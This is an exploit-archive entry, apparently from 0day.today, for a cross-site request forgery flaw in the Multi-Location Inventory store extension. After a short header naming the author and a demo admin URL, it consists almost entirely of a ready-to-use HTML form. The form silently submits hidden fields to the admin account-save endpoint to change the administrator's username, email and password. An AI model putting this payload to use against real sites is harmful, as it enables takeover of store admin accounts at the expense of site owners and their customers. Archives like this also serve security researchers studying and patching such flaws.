Multi-Location Inventory CSRF Vulnerability

# Exploit Title: Multi-Location Inventory CSRF 
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/multilocation-inventory/32183/
# Category::  webapps
# Demo : http://71207400.demo.aitoc.com/index.php/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="http://71207400.demo.aitoc.com/index.php/admin/system_account/save/key/f19ba693a47d7c1eaf8d83808c7fe6d9/" method="post" id="edit_form"><div><input name="form_key" 

type="hidden" value="byy7q80pAMzqYaVa" /></div><div class="entry-edit-head">
<input type="hidden" class=" input-text required-entry" title="User Name" value="admin" name="username" id="username"/>            
<input type="hidden" class=" input-text required-entry" title="First Name" value="Example" name="firstname" id="firstname"/>            
<input type="hidden" class=" input-text required-entry" title="Last Name" value="Example" name="lastname" id="lastname"/>           
<input type="hidden" class=" input-text required-entry" title="User Email" value="[email protected]" name="email" id="email"/>            
<input type="hidden" class="input-text validate-admin-password input-text" title="New Password" value="" name="new_password" id="password"/>            
<input type="hidden" class="input-text validate-cpassword input-text" value="" name="password_confirmation" id="confirmation"/>
<h3 class="icon-head head-system-account"></h3>    <p class="form-buttons"><button style="" onclick="setLocation(window.location.href)" class="scalable " type="button" 

id="id_ec5e7f6d5f6fa987155691694dbc83cc"><span>Reset</span></button><button style="" onclick="editForm.submit();" class="scalable save" type="button" 

id="id_e207deea5a09a06bd308894a95a87720"><span>Save Account</span></button></p>
</form>



#  0day.today [2018-02-19]  #